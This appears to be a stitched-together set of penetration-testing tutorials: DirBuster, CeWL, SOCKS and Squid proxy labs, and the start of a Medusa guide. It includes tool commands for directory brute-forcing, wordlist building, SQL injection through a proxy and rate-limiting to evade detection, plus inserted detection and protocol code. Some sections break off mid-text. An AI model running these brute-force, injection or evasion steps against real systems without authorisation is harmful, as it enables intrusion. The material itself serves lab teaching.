  8. Threat Intelligence — By knowing how to analyze internal and external threats an organization may face, you are gathering threat intelligence. This knowledge will then help you make more informed decisions on potential remediation solutions, plans, etc.
  9. Incident Response — Incident response skills come with being able to address and manage the aftermath of a security breach or cyber attack. This comes in handy in a world where an attack happens every 39 seconds on average.
  10. Endpoint Monitoring — Endpoints are typically the initial target because they provide an entry point to the network, and therefore, access to the data attackers want. Knowing how to thoroughly monitor those endpoints and detect unknown threats is a valuable skill for any IT security professional to have.
How Can You Get There?

The purple teamer training path was designed as a guide for you to become equally skilled in both advanced offensive and defensive security techniques. This training path includes the latest versions of our Penetration Testing Professional (PTP), Penetration Testing Extreme (PTX), and Threat Hunting Professional (THP) training courses. Dive into the Purple Teamer path with a free demo of each course and see for yourself!


Special Offer — Until November 30, 2018

If you are just beginning in this field, or if you feel that you need to review the penetration testing basics, we’re offering a free Penetration Testing Student (PTS) training course in Elite Edition with every enrollment in the PTP training course in Elite Edition until November 30, 2018.



Comprehensive Guide on Dirbuster Tool

In this article, we focus on enumerating directories with the Kali Linux tool DirBuster, trying to find hidden files and directories within a web server.

Table of Content

  • What is DirBuster
  • Default Mode
  • GET Request Method
  • Pure Brute Force (Numeric)
  • Single Sweep (Non-recursive)
  • Targeted Start
  • Blank Extensions
  • Search by File Type (.txt)
  • Changing DIR List
  • Following Redirects
  • Attack Through Proxy
  • Adding File Extensions
  • Evading Detective Measures (Requests Per Second)

What is DirBuster

DirBuster is an application within the Kali arsenal that is designed to brute force web and application servers. The tool can brute force directories and files. The application lets users take advantage of multi-threading to get things moving faster. In this article we will give you an overview of the tool and its basic functions.

Default Mode

We start DirBuster and only input http://testphp.vulnweb.com/ in the target URL field. Leave the rest of the options as they are. DirBuster will now auto switch between HEAD and GET requests to perform a list based brute force attack.

Let’s hit Start. DirBuster gets to work and starts brute forcing and we see various files and directories popping up in the result window.

GET Request Method

We will now set DirBuster to only use the GET request method. To make things go a little faster, the thread count is set to 200 and the “Go Faster” check box is checked.

In the Results – Tree View we can see findings.

Pure Brute Force (Numeric)

DirBuster allows a lot of control over the attack process; in this step we will use only numerals to perform a pure brute force attack. This is done by selecting “Pure Brute Force” in the scanning type option and selecting “0-9” in the char set drop-down menu. The minimum and maximum character lengths are left at their defaults.

In the Results – Tree View we can see findings.

Single Sweep (Non-recursive)

We will now perform a single sweep brute force where the dictionary words are used only once. To achieve this, we will unselect the “Be Recursive” checkbox.

In the Results – List View we can see findings.

Targeted Start

Further exploring the control options provided by DirBuster, we will set it up to start looking from the “admin” directory. In the “Dir to start with” field, type “/admin” and hit start.

In the Results – Tree View we can see findings.

Blank Extensions

DirBuster can also look into directories with a blank extension, which could potentially uncover data that might otherwise be left untouched. All we do is check the “Use Blank Extension” checkbox.

We can see the processing happen and DirBuster testing to find directories with blank extensions.

Search by File Type (.txt)

We will be setting the file extension type to .txt, by doing so, DirBuster will look specifically for files with a .txt extension. Type “.txt” in the File extension field and hit start.

We can see the processing happen and DirBuster testing to find directories with a .txt extension.

Changing DIR List

We will now change the directory list in DirBuster: Options > Advanced Options > DirBuster Options > Dir list to use. Here we can browse and change the list to “directory-list-2.3-medium.txt”, found at /usr/share/dirbuster/wordlists/ in Kali.

We can see the word list is now set.

Following Redirects

DirBuster by default is not set to follow redirects during the attack, but we can enable this option under Options > Follow Redirects.

We can see the results in the scan information as the test progresses.

Results in the Tree View.

Attack through Proxy

DirBuster can also attack using a proxy. In this scenario we try to open a webpage at 192.168.1.108 but are denied access.

We set the IP in DirBuster as the attack target.

Before we start the attack, we set up the proxy option under Options > Advanced Options > Http Options. Here we check the “Run through a proxy” checkbox, input the IP 192.168.1.108 in the Host field and set the port to 3129.

We can see the test showing results.

Adding File Extensions

Some file extensions, mostly image formats, are excluded from DirBuster’s search by default. We can have them searched for by navigating to Options > Advanced Options > HTML Parsing Options.

We will delete jpeg from that exclusion list in this instance and click OK.

In the File Extension field we will type in “jpeg” to explicitly tell DirBuster to look for .jpeg format files.

We can see in the testing process, DirBuster is looking for and finding jpeg files.

Evading Detective Measures

Exceeding the warranted requests per second during an attack is a sure-fire way to get flagged by whatever detective measures are in place. DirBuster lets us control the requests per second to bypass this defense. Options > Advanced Options > Scan Options is where we can enable this setting.

We set Connection Time Out to 500, check “Limit number of requests per second” and set that field to 20.

Once the test is initiated, we will see results. The scan was stopped to show the initial findings.

Once the scan is complete the actual findings can be seen.
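From the defender’s side, the throttling just described is exactly what a simple per-second threshold misses. As an added example (not from the article or from DirBuster), the Python below parses Apache combined-format access log lines and flags a source both on a burst of 404s within one second and on the number of distinct missing paths over a longer window, so a scan capped at a few requests per second is still caught; the log lines, IP addresses and thresholds are constructed for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" log format. Constructed for this example; adjust to your own format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "method": m.group("method"),
            "path": m.group("path"), "status": int(m.group("status"))}


def find_bruteforcers(lines, burst_per_sec=10, window_sec=300, distinct_404s=50):
    """Map source IP -> reason for sources whose 404s look like list-based forcing.

    Rule 1 (burst): too many 404s in a single one-second bucket; catches a default
    DirBuster run with many threads.  Rule 2 (slow): too many distinct missing paths
    within window_sec; still fires when the scanner caps itself at a few requests per
    second, which is what the "Limit number of requests per second" option does.
    """
    per_sec = defaultdict(lambda: defaultdict(int))   # ip -> second -> 404 count
    missing = defaultdict(list)                        # ip -> [(ts, path), ...]
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["status"] != 404:
            continue
        per_sec[rec["ip"]][rec["ts"].replace(microsecond=0)] += 1
        missing[rec["ip"]].append((rec["ts"], rec["path"]))

    flagged = {}
    for ip, buckets in per_sec.items():
        peak = max(buckets.values())
        if peak >= burst_per_sec:
            flagged[ip] = f"burst: {peak} 404s in one second"
            continue
        events = sorted(missing[ip])
        start = 0
        for end in range(len(events)):          # sliding window over sorted timestamps
            while (events[end][0] - events[start][0]).total_seconds() > window_sec:
                start += 1
            paths = {p for _, p in events[start:end + 1]}
            if len(paths) >= distinct_404s:
                flagged[ip] = f"slow: {len(paths)} distinct 404 paths within {window_sec}s"
                break
    return flagged


def _sample_log():
    """Constructed sample traffic: a DirBuster-style burst, a throttled scan, a normal visitor."""
    base = datetime(2018, 11, 20, 10, 0, 0, tzinfo=timezone.utc)

    def line(ip, offset, path, status, method="HEAD"):
        ts = (base + timedelta(seconds=offset)).strftime("%d/%b/%Y:%H:%M:%S %z")
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 199 "-" "DirBuster-1.0-RC1"'

    # 12 misses in the same second from one source (burst)
    lines = [line("10.0.0.5", 0, f"/{w}/", 404) for w in (
        "cgi-bin", "admin", "backup", "old", "test", "images",
        "tmp", "db", "logs", "config", "private", "dev")]
    # 60 misses at only 2 per second from another source (throttled scan)
    lines += [line("10.0.0.9", i // 2, f"/admin/list{i}.txt", 404, "GET") for i in range(60)]
    # an ordinary visitor with a single 404
    lines += [line("10.0.0.7", 5, "/index.php", 200, "GET"),
              line("10.0.0.7", 9, "/favicon.ico", 404, "GET")]
    return lines


SAMPLE_LOG = _sample_log()

if __name__ == "__main__":
    for ip, why in sorted(find_bruteforcers(SAMPLE_LOG).items()):
        print(ip, why)
```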

We hope you enjoy using this tool. It is a great tool that’s a must in a pentester’s arsenal.

Stay tuned for more articles on the latest and greatest in hacking.

Author: Shubham Sharma is a Cyber security enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post Comprehensive Guide on Dirbuster Tool appeared first on Hacking Articles.

Comprehensive Guide on Cewl Tool

Hello Friends!! In this article we are focusing on Generating Wordlist using Kali Linux tool Cewl and learn more about its available options.

Table of Content

  • Introduction to Cewl
  • Default Method
  • Save Wordlist in a file
  • Generating Wordlist of Specific Length
  • Retrieving Emails from a Website
  • Count the number of Word Repeated in a website
  • Increase the Depth to Spider
  • Extra Debug Information
  • Verbose Mode
  • Generating Alpha-Numeric
  • Cewl with Digest/Basic Authentication
  • Proxy URL

Introduction to Cewl

CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper. CeWL also has an associated command line app, FAB (Files Already Bagged) which uses the same meta data extraction techniques to create author/creator lists from already downloaded.

Source : https://tools.kali.org/password-attacks/cewl

Type “cewl -h” in the terminal; it will list all the available options it accepts along with their descriptions.

SYNTAX: cewl <url> [options]

General Options

  -h, --help                 Show help.
  -k, --keep                 Keep the downloaded file.
  -d <x>, --depth <x>        Depth to spider to, default 2.
  -m, --min_word_length      Minimum word length, default 3.
  -o, --offsite              Let the spider visit other sites.
  -w, --write                Write the output to the file.
  -u, --ua <agent>           User agent to send.
  -n, --no-words             Don’t output the wordlist.
  --with-numbers             Accept words with numbers in as well as just letters.
  -a, --meta                 Include meta data.
  --meta_file file           Output file for meta data.
  -e, --email                Include email addresses.
  --email_file <file>        Output file for email addresses.
  --meta-temp-dir <dir>      The temporary directory used by exiftool when parsing files, default /tmp.
  -c, --count                Show the count for each word found.
  -v, --verbose              Verbose.
  --debug                    Extra debug information.

Authentication

  --auth_type                Digest or basic.
  --auth_user                Authentication username.
  --auth_pass                Authentication password.

Proxy Support

  --proxy_host               Proxy host.
  --proxy_port               Proxy port, default 8080.
  --proxy_username           Username for proxy, if required.
  --proxy_password           Password for proxy, if required.

Default Method

Enter the following command, which spiders the given URL to the default depth and prints a list of words that can then be used as a dictionary for password cracking.

cewl http://www.ignitetechnologies.in/

Save Wordlist in a file

For record keeping, better readability and future reference, we save the printed word list to a file. To do this we use the -w parameter, which writes the output to a text file.

cewl http://www.ignitetechnologies.in/ -w dict.txt

Now that we have executed the command, let’s go to that location to check whether the output has been saved to the file or not. In this case our output location is /root/dict.txt.

cat dict.txt

Generating Wordlist of Specific Length

If you want to generate a wordlist with a minimum word length, use the -m option, which sets the minimum word length parameter.

cewl http://www.ignitetechnologies.in/ -m 9

The above command will generate a list of words with a minimum of 9 characters; as you can observe in the following image, it has crawled the given website and printed the list of words that are at least 9 characters long.

Retrieving Emails from a Website

You can use the -e option, which enables email extraction, along with the -n option, which hides the list of words generated while crawling the given website.

cewl http://www.ignitetechnologies.in/ -n -e

As shown in the image below, it has successfully found one email address inside the website.

Count the number of Word Repeated in a website

If you want to count how many times each word is repeated in a website, use the -c option, which enables the count parameter.

cewl http://www.ignitetechnologies.in/ -c

As you can observe from the image below, it has printed the count for each word found in the given website.

Increase the Depth to Spider

If you want to increase the spidering level to generate a larger wordlist by enumerating more new words from the website, use the -d option with a depth level number; this sets the depth parameter for more intensive crawling. By default the depth level is set to 2.

cewl http://www.ignitetechnologies.in/ -d 3

Extra Debug Information

You can use the --debug option, which enables debug mode and shows errors and raw details of the website while crawling.

cewl http://www.ignitetechnologies.in/ --debug

Verbose Mode

To expand the website crawling result and retrieve complete details of a website, you can use the -v option for verbose mode. Rather than only generating a wordlist, it will dump the information available on the website.

cewl http://www.ignitetechnologies.in/ -v

Generating Alpha-Numeric

If you want to generate an alpha-numeric wordlist, you can use the --with-numbers option along with the command.

cewl http://testphp.vulnweb.com/ --with-numbers

From the image below you can observe that this time it has generated an alpha-numeric wordlist.
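As an added, self-contained approximation of what CeWL does with the -m, -c, --with-numbers and -e options explained above (example code, not CeWL’s own, using only the Python standard library; the sample page and addresses are constructed), this script parses one HTML page and builds the word counts and the email list. It is the kind of check a site owner can run over their own pages to see which terms would land in such a dictionary.

```python
import re
from collections import Counter
from html.parser import HTMLParser


class _PageText(HTMLParser):
    """Collects visible text (script/style skipped) and mailto: targets from one page."""

    def __init__(self):
        super().__init__()
        self.chunks, self.emails, self._skip = [], set(), 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
        elif tag == "a":
            href = dict(attrs).get("href") or ""
            if href.lower().startswith("mailto:"):
                self.emails.add(href[7:].split("?")[0])

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)


EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def _visible_text(html):
    p = _PageText()
    p.feed(html)
    return " ".join(p.chunks), p.emails


def extract_words(html, min_len=3, with_numbers=False):
    """Counter of candidate words from one page: min_len mirrors -m, with_numbers mirrors
    --with-numbers, and the counts are what -c prints. Case is kept, as CeWL keeps it."""
    text, _ = _visible_text(html)
    token_re = r"[A-Za-z0-9]+" if with_numbers else r"[A-Za-z]+"
    return Counter(w for w in re.findall(token_re, text) if len(w) >= min_len)


def extract_emails(html):
    """Addresses found in page text or in mailto: links (the -e behaviour)."""
    text, mailto = _visible_text(html)
    return sorted(mailto | set(EMAIL_RE.findall(text)))


# Constructed sample page (not a real site).
SAMPLE_HTML = """<html><head><title>Ignite Technologies</title>
<script>var token = "shouldNotAppear123";</script></head>
<body><h1>Ignite Technologies</h1>
<p>Penetration testing training since 2012. Our penetration testers love Kali.</p>
<p>Write to <a href="mailto:info@example.com?subject=hi">us</a> or hr@example.com.</p>
</body></html>"""

if __name__ == "__main__":
    for word, n in extract_words(SAMPLE_HTML, min_len=9).most_common():
        print(n, word)
    print(extract_emails(SAMPLE_HTML))
```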

Cewl with Digest/Basic Authentication

If the website requires login authentication, the default command above will not work properly; to generate a wordlist you need to authenticate to the page using the following parameters:

--auth_type:   Digest or basic.

--auth_user:   Authentication username.

--auth_pass:   Authentication password.

cewl http://192.168.1.105/dvwa/login.php --auth_type Digest --auth_user admin --auth_pass password -v

or

cewl http://192.168.1.105/dvwa/login.php --auth_type basic --auth_user admin --auth_pass password -v

From the image below you can observe that it got an HTTP response of 200 and hence generated the wordlist.

Proxy URL

When a website is running behind a proxy server, cewl will not be able to generate a wordlist with the default command, as shown in the image below.

cewl -w dict.txt http://192.168.1.103/wordpress/

You can use the --proxy_host and --proxy_port options to set the proxy and generate a wordlist with the following command:

cewl --proxy_host 192.168.1.103 --proxy_port 3128 -w dict.txt http://192.168.1.103/wordpress/

As you can observe in the image below, after executing the 2nd command it has successfully printed the list of words as output.

Author: Shubham Sharma is a Cyber security enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post Comprehensive Guide on Cewl Tool appeared first on Hacking Articles.

Socks Proxy Penetration Lab Setup using Microsocks

Hello friends!! In our previous article we discussed “Web Proxy Penetration Lab Setup Testing using Squid”; in today’s article we are going to set up a SOCKS proxy as a proxy server on Ubuntu/Debian machines and try to penetrate it.

Table of Content

  • Introduction to proxy
  • What is socks proxy
  • Difference Between Socks proxy and HTTP Proxy
  • Socks proxy Installation
  • Web Proxy Penetration Testing
  • SSH Proxy Penetration Testing
  • FTP Proxy Penetration Testing

Introduction to Proxy

A proxy is a computer system or program that acts as a kind of middle-man, or intermediary, between your web browser and another computer. Your ISP operates servers, computers designed to deliver information to other computers, and uses proxy servers to accelerate the transfer of information between the server and your computer.

For example: two users, say A and B, have both requested the same website from the server. Instead of retrieving the data from the original server again, the proxy has “stored or cached” a copy of that site and sends it to user A without troubling the main server.

What is SOCKS Proxy?

A SOCKS server is an all-purpose proxy server that creates a TCP connection to another server on the client’s behalf, then exchanges network packets between the client and that server. The Tor onion proxy software serves a SOCKS interface to its clients. SSH tunnels can also make their connections using the SOCKS protocol.

For high security you can go with SOCKS5 protocol that provides various authentication options which you cannot get with the SOCKS4 protocol.

Difference Between Socks proxy and HTTP Proxy

  • SOCKS proxies are low-level, designed as general proxies able to accommodate effectively any protocol, program, or type of traffic.
  • SOCKS proxies support both TCP and UDP transport protocols.
  • SOCKS operates at Layer 5 of the OSI model.
  • A SOCKS server accepts incoming client connections on TCP port 1080.
  • HTTP proxies proxy HTTP requests, while SOCKS proxies proxy socket connections.
  • HTTP proxies are high-level and designed for a specific protocol.
  • HTTP proxies can only process requests from applications that use the HTTP protocol.
  • An HTTP proxy proxies HTTP or web traffic at Layer 7.
  • An HTTP proxy accepts incoming client connections on HTTP proxy port 3128.

Socks Proxy Installation

For the SOCKS proxy lab set-up we are going to download microsocks from GitHub. MicroSocks is a multithreaded, small, efficient SOCKS5 server. It is very lightweight and very light on resources too: for every client, a thread with a stack size of 8KB is spawned.

Let’s start!!

Open the terminal with sudo rights and enter the following command:

git clone https://github.com/rofl0r/microsocks.git

Once downloading is completed run the following command for its installation:

cd microsocks
make
make install

Now execute the following command to run socks proxy on port 1080 without authentication.

microsocks -p 1080

As you can observe, FTP, SSH, HTTP and SOCKS are running on our local machine. Now let’s go for SOCKS penetration testing on the various protocols to check whether it is the all-purpose program described above.
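As an added illustration (not from the original article or the microsocks project), this Python shows the SOCKS5 exchange that a client such as Firefox or proxychains performs against the no-authentication server started with microsocks -p 1080: the greeting, the method selection, the CONNECT request and the reply. The encode/decode helpers follow RFC 1928; socks5_connect and the addresses used below are assumptions for the demo.

```python
import socket
import struct

SOCKS_VERSION = 5
NO_AUTH, USER_PASS, NO_ACCEPTABLE = 0x00, 0x02, 0xFF
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN = 0x01, 0x03
REPLY_TEXT = {0: "succeeded", 1: "general failure", 2: "not allowed by ruleset",
              3: "network unreachable", 4: "host unreachable", 5: "connection refused"}


def build_greeting(methods=(NO_AUTH,)):
    """Client -> server: VER, NMETHODS, METHODS.  microsocks without -u/-P accepts NO_AUTH."""
    return bytes([SOCKS_VERSION, len(methods), *methods])


def parse_method_select(data):
    """Server -> client: VER, METHOD.  Returns the chosen method or raises."""
    if len(data) != 2 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 method selection")
    if data[1] == NO_ACCEPTABLE:
        raise ConnectionError("server accepts none of our authentication methods")
    return data[1]


def build_connect(host, port):
    """Client -> server CONNECT request.  Dotted IPv4 goes as ATYP 1; anything else is
    sent as a domain name (ATYP 3) so the proxy, not the client, resolves it."""
    try:
        addr = bytes([ATYP_IPV4]) + socket.inet_aton(host)
    except OSError:
        name = host.encode("idna")
        addr = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([SOCKS_VERSION, CMD_CONNECT, 0x00]) + addr + struct.pack("!H", port)


def parse_reply(data):
    """Server -> client: VER, REP, RSV, ATYP, BND.ADDR, BND.PORT.
    Returns (rep, bound_addr, bound_port); rep == 0 means the TCP connection was made."""
    if len(data) < 4 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 reply")
    rep, atyp = data[1], data[3]
    if atyp == ATYP_IPV4:
        addr, rest = socket.inet_ntoa(data[4:8]), data[8:]
    elif atyp == ATYP_DOMAIN:
        n = data[4]
        addr, rest = data[5:5 + n].decode(), data[5 + n:]
    else:
        raise ValueError("unsupported ATYP %d" % atyp)
    return rep, addr, struct.unpack("!H", rest[:2])[0]


def socks5_connect(proxy_host, proxy_port, dest_host, dest_port, timeout=5):
    """Open a TCP socket to dest through the proxy (no-auth mode).  Returns the socket,
    which then carries the inner protocol (HTTP, SSH, FTP control channel, ...) unchanged."""
    s = socket.create_connection((proxy_host, proxy_port), timeout=timeout)
    s.sendall(build_greeting())
    parse_method_select(s.recv(2))
    s.sendall(build_connect(dest_host, dest_port))
    rep, _, _ = parse_reply(s.recv(262))          # 262 = largest possible reply
    if rep != 0:
        s.close()
        raise ConnectionError("proxy refused: " + REPLY_TEXT.get(rep, str(rep)))
    return s


if __name__ == "__main__":
    # Assumed lab addresses from the article: proxy 192.168.1.103:1080, SSH on the same host.
    with socks5_connect("192.168.1.103", 1080, "192.168.1.103", 22) as s:
        print(s.recv(64))                          # expect an SSH banner
```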

Web Proxy Penetration Testing

Now configure the Apache service for the web proxy: open the “000-default.conf” file from the path /etc/apache2/sites-available/ and add the following lines to apply these rules to the /html directory over localhost or the machine IP (192.168.1.103).

<Directory /var/www/html/>
    Options Indexes FollowSymLinks MultiViews
    AllowOverride None
    Order deny,allow
    deny from all
    allow from 127.0.0.1 192.168.1.103
</Directory>

Now save the file and restart the Apache service with the following command.

service apache2 restart

Now when someone tries to access web services through our network, i.e. 192.168.1.103, he/she will be greeted by the following web page:

“Error 403 Forbidden- You don’t have permission to access <requested page>”.

When you face such a situation, where port 80 is open but you are unable to access it, it proves that the network is running behind a proxy server.

For web proxy penetration testing we had already set up a lab with a web application server such as DVWA (Read Article from here).

Now, to test whether our proxy server is working, let’s open Firefox and go to Edit –> Preferences –> Advanced –> Network –> Settings, select “Manual proxy configuration” and enter the SOCKS proxy server IP address (192.168.1.103) and Port (1080) to be used for all protocols.

BOOMMM!! Connected to Proxy server successfully using HTTP Proxy in our Browser.

SSH Proxy Penetration Testing

Now configure the hosts.allow file for the SSH proxy: open /etc/hosts.allow and add the following lines to allow SSH connections from the localhost IP and restrict all others.

sshd : localhost : allow
sshd : 192.168.1.103: allow
sshd : ALL: deny

Now open proxychains configuration file from the given path /etc/proxychains.conf in your kali Linux and then add following line at the bottom.

socks5 192.168.1.103 1080

Now when we try to connect to the target machine via port 22 for an SSH connection we get the error message “Connection reset by peer”, as shown in the image below after executing the 1st command.

ssh pentest@192.168.1.103

When you face such a situation, where port 22 is open but you are unable to access it, it proves that the network is running behind a proxy server.

But if you use proxychains along with the command, after saving the configuration as described above, then you can easily connect to the target network via port 22 for an SSH connection, as shown in the image below after executing the 2nd command.

proxychains ssh pentest@192.168.1.103

FTP Proxy Penetration Testing

Now configure the vsftpd.conf file for the FTP proxy: open /etc/vsftpd.conf and add the following lines to allow FTP connections from the localhost IP and restrict other networks.

<Limit Login>
Order Allow, Deny
Allow from 127.0.0.1 192.168.1.103
Deny from all
</Limit>

Using FileZilla, when we try to connect to 192.168.1.103 via port 21 to access the FTP service, we get the error “Connection closed by server”.

When you face such a situation, where port 21 is open but you are unable to access it, it proves that the network is running behind a proxy server.

But FileZilla has many features, and it offers a generic proxy option that forces passive mode on the FTP connection. Go to Settings > Connection > FTP, select the “generic proxy” option and make the following configuration settings.

  • Choose SOCKS 5 as the generic proxy
  • Proxy host IP: 192.168.1.103
  • Proxy port: 1080

Now when you try again to connect to the target machine via port 21 to access the FTP service, you will be able to access it easily, as shown in the last image.

Hence proved: SOCKS is indeed an all-purpose proxy server. Hopefully you have found this article very helpful and completely understood the working of a proxy server and the other related topics covered in this article.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher  Contact Here

The post Socks Proxy Penetration Lab Setup using Microsocks appeared first on Hacking Articles.

Web Proxy Penetration Lab Setup Testing using Squid

In this article we are going to setup Squid to use it as a Proxy Server on Ubuntu/Debian machines and will try to penetrate it.

Table of content

  • Introduction to Proxy Setting
  • Squid Proxy Installation
  • Squid Proxy Server Configuration
  • Configuring Apache service for Web Proxy
  • Web Proxy Penetration Testing
  • Directory Brute force Attack on Proxy Server Using DIRB Tool
  • Vulnerability Scanning on Proxy Server Using Nikto Tool
  • SQL Injection on Proxy Server Using Sqlmap Tool
  • WordPress Scanning on Proxy Server Using WPScan Tool

Introduction to Proxy Setting

A proxy is a computer system or program that acts as a kind of middle-man, or intermediary, between your web browser and another computer. Your ISP operates servers, computers designed to deliver information to other computers, and uses proxy servers to accelerate the transfer of information between the server and your computer.

For example: two users, say A and B, have both requested the same website from the server. Instead of retrieving the data from the original server again, the proxy has “stored or cached” a copy of that site and sends it to user A without troubling the main server.

Squid Proxy Installation

Squid is a cross-functional web proxy cache server application which offers proxy and cache services for HTTP, FTP and other common network protocols, including proxying of Secure Sockets Layer (SSL) requests and caching of Domain Name Server (DNS) lookups, and it implements transparent caching. Moreover, it supports a wide variety of caching protocols.

Let’s Begin!!

Open the hosts file on your local machine and add the localhost address and hostname, because by default squid3 looks up the hostname (Ubuntu) when setting up its connections.

Now use the apt repository to install squid3 by entering the following command.

apt-get install squid3

Squid Proxy Server Configuration

Once the installation is completed, open its configuration file from the given path: /etc/squid3/squid.conf

With Squid’s access controls, you can restrict the Internet services proxied by Squid so that they are accessible only to clients with specific IP addresses.

Suppose you want to grant access by users of the 192.168.1.0/24 subnetwork only, then add the following line to the  ACL section of the squid.conf file:

acl lan src 192.168.1.0/24

Now give permission to your clients to access HTTP service over local network.

http_access allow lan

To set your Squid server to listen on the default TCP port 3128, change the http_port directive as given below:

http_port 3128

Then add the following rules for Squid after the http_port directive:

request_header_access Referer deny all
request_header_access X-Forwarded-For deny all
request_header_access Via deny all
request_header_access Cache-Control deny all

You can set forwarded_for to one of: on|off|transparent|truncate|delete

  • If set to “on”, Squid will append your client’s IP address to the HTTP requests it forwards. By default it looks like:

X-Forwarded-For: 192.1.2.3

  • If set to “off”, it will appear as

X-Forwarded-For: unknown

  • If set to “transparent”, Squid will not alter the X-Forwarded-For header in any way.
  • If set to “delete”, Squid will delete the entire X-Forwarded-For header.
  • If set to “truncate”, Squid will remove all existing

Here we set forwarded_for off and save the file, then use the following command to restart the Squid proxy.

sudo service squid3 restart

Configuring Apache service for Web Proxy

Now open the “000-default.conf” file from the path /etc/apache2/sites-available/ and add the following lines to apply these rules to the /html directory over localhost or the machine IP (192.168.1.103).

<Directory /var/www/html/>
    Options Indexes FollowSymLinks MultiViews
    AllowOverride None
    Order deny,allow
    deny from all
    allow from 127.0.0.1 192.168.1.103
</Directory>

Now save the file and restart the Apache service with the following command.

service apache2 restart

Now when someone tries to access web services through our network, i.e. 192.168.1.103, he/she will be greeted by the following web page:

“Error 403 Forbidden- You don’t have permission to access <requested page>”.

When you face such a situation, where port 80 is open but you are unable to access it, it proves that the network is running behind a proxy server.

Web Proxy Penetration Testing

For web Proxy penetration testing we had already set-up lab for web application server such as DVWA and SQli DHAKKAN (Read Article from here) and wordpress (Read Article from here).

Now, to test whether our proxy server is working, let’s open Firefox and go to Edit –> Preferences –> Advanced –> Network –> Settings, select “Manual proxy configuration” and enter the proxy server IP address (192.168.1.103) and Port (3128) to be used for all protocols.

BOOMMM!! Connected to Proxy server successfully using HTTP Proxy in our Browser.

Directory Brute force Attack on Proxy Server Using DIRB Tool

While making a directory brute force attack with the help of DIRB we can use the -p option, which sets a proxy URL to be used for all requests; by default it works on port 1080. As you have observed, exploring the target network IP in the web browser produced an “Access forbidden” error, which means this web page is running behind some proxy.

dirb http://192.168.1.103
dirb http://192.168.1.103 -p 192.168.1.103:3128

From the image below you can take reference for the output obtained for the above commands: here we haven’t obtained any directory or file on executing the 1st command, whereas the 2nd command executed successfully.

Vulnerability Scanning on Proxy Server Using Nikto Tool

Similarly while scanning any network running behind proxy server, we can use -useproxy option to scan the vulnerability.

nikto -h 192.168.1.103
nikto -h 192.168.1.103 -useproxy http://192.168.1.103:3128

From the image below you can take reference for the output obtained for the above commands: here we haven’t obtained any result on executing the 1st command, whereas the 2nd command executed successfully.

SQL Injection on Proxy Server Using Sqlmap Tool

As you can observe, on executing the following command it returns a “403 forbidden error”, which means this web page is running behind some proxy.

sqlmap -u http://192.168.1.103/sqli/Less-1/?id=1 --dbs

Hence we can use the --proxy option to connect to the target URL; therefore execute the following command:

sqlmap -u http://192.168.1.103/sqli/Less-1/?id=1 --dbs --proxy http://192.168.1.103:3128

Now from the image below you can observe that we have successfully retrieved the database names by exploiting the SQL injection vulnerability.

WordPress Scanning on Proxy Server Using WPScan Tool

As you can observe, on executing the following command it returns a “403 forbidden error”, which means this web page is running behind some proxy.

wpscan --url http://192.168.1.103/wordpress --wp-content-dir wp-content

Hence we can use the --proxy option to connect to the target URL; therefore execute the following command:

wpscan --url http://192.168.1.103/wordpress --wp-content-dir wp-content  --proxy http://192.168.1.103:3128

Hopefully you have found this article very helpful and completely understood the working of a proxy server and the other related topics covered in this article.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher  Contact Here

The post Web Proxy Penetration Lab Setup Testing using Squid appeared first on Hacking Articles.

Why you need to know about Penetration Testing and Compliance Audits?

We live in an age where data flows like water, becoming the new life source of our everyday ventures. As such, you can just imagine what all of that entails and the weight that data receive, especially when it comes to a decision making on how to handle this fairly new and arguably invaluable resource. Of course, we are well aware from a very young age that our water needs to be pure, filtered

Comprehensive Guide on Medusa – A Brute Forcing Tool

Hello friends!! Today we are going to discuss how effective Medusa is at cracking login credentials for various protocols to gain unauthorized remote access to a system. In this article we discuss each option available in Medusa for making brute force attacks in various scenarios.

Table OF Content

  • Introduction to Medusa and its features
  • Password Cracking For Specific Username
  • Username Cracking for Specific Password
  • Cracking Login Credential
  • Making Brute Force Attack on Multiple Host
  • Attacking on Specific Port Instead of Default
  • NULL/Same as Login Attempt
  • Save logs to Disk
  • Stop on Success
  • Suppress Startup Banner
  • Verbose Mode
  • Error Debugging Mode
  • Using Combo Entries
  • Resuming the Brute Force Attack

Introduction to Medusa and its features

Medusa is a speedy, parallel, and modular login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers the following items to be some of the key features of this application:

  • Thread-based parallel testing. Brute-force testing can be performed against multiple hosts, users or passwords concurrently.
  • Flexible user input. Target information (host/user/password) can be specified in a variety of ways. For example, each item can be either a single entry or a file containing multiple entries. Additionally, a combination file format allows the user to refine their target listing.
  • Modular design. Each service module exists as an independent .mod file. This means that no modifications are necessary to the core application in order to extend the supported list of services for brute-forcing.
  • Multiple protocols supported. Many services are currently supported (e.g. SMB, HTTP, POP3, MS-SQL, SSHv2, among others).

Reference Source: http://www.foofus.net

Type "medusa" in the terminal without any options and it will dump all the options it accepts along with their respective descriptions.

Syntax: medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

  -h [TEXT]   : Target hostname or IP address
  -H [FILE]   : File containing target hostnames or IP addresses
